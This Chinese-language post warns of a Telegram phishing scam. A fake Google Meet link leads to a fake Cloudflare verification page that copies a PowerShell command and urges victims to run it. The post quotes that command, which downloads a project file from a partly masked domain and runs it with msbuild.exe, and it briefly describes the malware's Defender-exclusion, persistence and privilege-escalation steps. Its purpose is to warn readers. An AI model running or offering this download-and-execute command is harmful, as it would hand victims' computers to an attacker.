关于TG新型钓鱼的预警,模仿谷歌会议

大概简述
本来打算睡觉了 没想到还有高手，第一次我没搭理他，后面他说他可以付费来请教我一些问题，但是非要和我语音(此时我觉得有意思起来了)，我就顺着他说可以，结果发了一个网址，如下图(网址是模仿谷歌会议)，打开之后如图3(模仿CF人机验证)，此时浏览器会默认复制如下内容：
powershell -c "iwr https://*****.com/x.proj -o C:\ProgramData\s.proj; & $env:windirMicrosoft.NET\Framework64\v4.0.30319\msbuild.exe C:\ProgramData\s.proj"


网页大概内容是把复制的这些在终端运行获取验证码过人机验证，但是如果你真这样做了，恭喜你，你电脑已经是他的玩物了。

关于这个病毒样本我简单分析了下，大概流程如下：
使用合法的MSBuild项目文件格式伪装，绕过基础文件类型检查
利用微软官方XML命名空间增加可信度
通过MSBuild执行链调用PowerShell，规避进程监控
使用cmd /c嵌套调用实现命令混淆，随后把落地木马添加到Defender(windows自带杀软)白名单，延迟76秒运行来规避其他杀软扫描，最后根据运行木马的当前权限执行不同的后续操作，如果是管理员则执行计划任务来达到定时运行，电脑重启自动运行等，如果非管理员则执行UAC提权等操作再进行权限维持等操作，后续就是木马该有的一些操作了，不过值得一提的是貌似该木马的制作人是老毛子，木马有部分俄语提示：

Попытка $attempt из $maxAttempts...

最后，任何人让你访问任何未知的网址都要谨慎--消息来源-米娅频道